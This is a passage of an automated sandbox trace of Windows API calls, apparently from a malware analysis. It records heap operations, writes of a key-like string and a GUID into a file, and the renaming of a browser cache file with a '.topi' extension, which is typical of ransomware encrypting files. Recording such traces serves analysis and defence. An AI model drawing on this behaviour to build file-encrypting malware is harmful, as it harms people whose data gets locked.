out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31ccc08 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ccc08 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52d0 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52b8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc268 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.189] WriteFile (in: hFile=0x6a8, lpBuffer=0x9ccfb24*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9ccfb24*, lpNumberOfBytesWritten=0x9ccfb14*=0x8, lpOverlapped=0x0) returned 1 [0099.189] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.189] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.189] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.189] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.189] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.190] CloseHandle (hObject=0x6a8) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf0) returned 0x9a03438 [0099.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x900) returned 0x31cf750 [0099.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.201] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.topi")) returned 1 [0099.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.202] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0099.204] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0099.204] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6298 [0099.204] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.209] 